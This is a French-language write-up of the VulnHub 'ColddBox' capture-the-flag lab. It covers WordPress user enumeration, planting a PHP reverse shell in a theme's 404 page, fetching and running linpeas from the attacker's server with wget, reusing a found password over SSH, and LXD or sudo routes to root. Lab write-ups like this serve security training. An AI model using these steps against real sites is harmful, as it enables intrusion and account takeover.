CTF-ColddBox – Hacking Escalation de Privilége

CTF Colddbox Vulnub ZwX

Le CTF ColddBox qui est disponible sur le site de Vulnhub.com est une machine virtuelle basée sous le CMS WordPress. Pour les personnes qui ont déjà un peu d’expérience dans le Hacking de CTF est très simple à finir 🙂 pour les personnes qui ont moins d’expérience il faudra cherché un peu.

Objectifs du CTF:
  • Analyse du site web (Prendre le contrôle du site)
  • Injecter un shell (Shell Reverse, Web Shell…)
  • Trouver le Flag User (Trouver le moyen de lire le flag)
  • Trouver le Flag Root (Trouver le moyen d’être Root, lire le Flag Root)
Analyse & Enumeration:

Analysons notre réseau avec un Netdiscover afin de trouver l’adresse exacte du serveur, puis trouvons les ports ouverts de la machine avec le logiciel Nmap (je vous passe les détailles maintenant :).

Une fois les ports trouvés nous visitons le site Web.

Je ne donne pas les ports ouverts 🙂 c’est à vous de trouver maintenant, je pense que vous connaissez la procédure.

Nous avons pu trouver les utilisateurs du site 😉 il vous reste à trouver les mots de passe de ces utilisateurs puis à vous connecter au site.

Prise de contrôle du site & Injection d’un Shell:

Une fois dans le site, nous avons inséré un Reverse shell en Php sur une page d’erreur 404 sur l’un des thèmes WordPress 🙂 puis nous avons activé un port découte avec Netcat.

Privilége Escalation & FlagUser:

Comme le montre l’image ci-dessous, nous avons reussi à localiser le fichier (user.txt) mais malheureusement nous n’y avons pas accès 🙁 .

Donc nous allons essayer de trouver un maximum d’informations pour avoir des droits plus privilégiés.

Nous allons télécharger un fichier qui se nomme Linpeas, que nous allons mettre sur un notre serveur puis le télécharger sur le serveur de la victime afin d’énumérer toutes les informations importantes que l’on puisse trouver 🙂 Je me rends donc dans le répertoire /tmp/ ensuite nous téléchargeons le fichier que nous avons déjà installé sur notre serveur avec la commande “wget http://127.0.1/linpeas.sh” .

Nous rendons le script exécutable avec la commande “chmod +x linpeas.sh” puis nous l’exécutons en tapant “./Linpeas.sh”.

Notre script nous a trouvé un mot de passe d’une base donnée 😉 essayons-le en nous connectant au serveur SSH. Voilà nous sommes connecté sur le serveur SSH avec un utilisateur avec beaucoup plus de droits 🙂 et ainsi nous avons pu lire notre Flag User.

Privilége Escalation & FlagRoot:

J’ai trouvé deux manières de passer Root, la première est de bypasser le mot de passe Root avec la vulnérabilité LXD, et la seconde si vous avez réussi à trouver le mot de passe de l’utilisateur “c0 ldd”, en tapant simplement la commande “sudo -l” 🙂

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *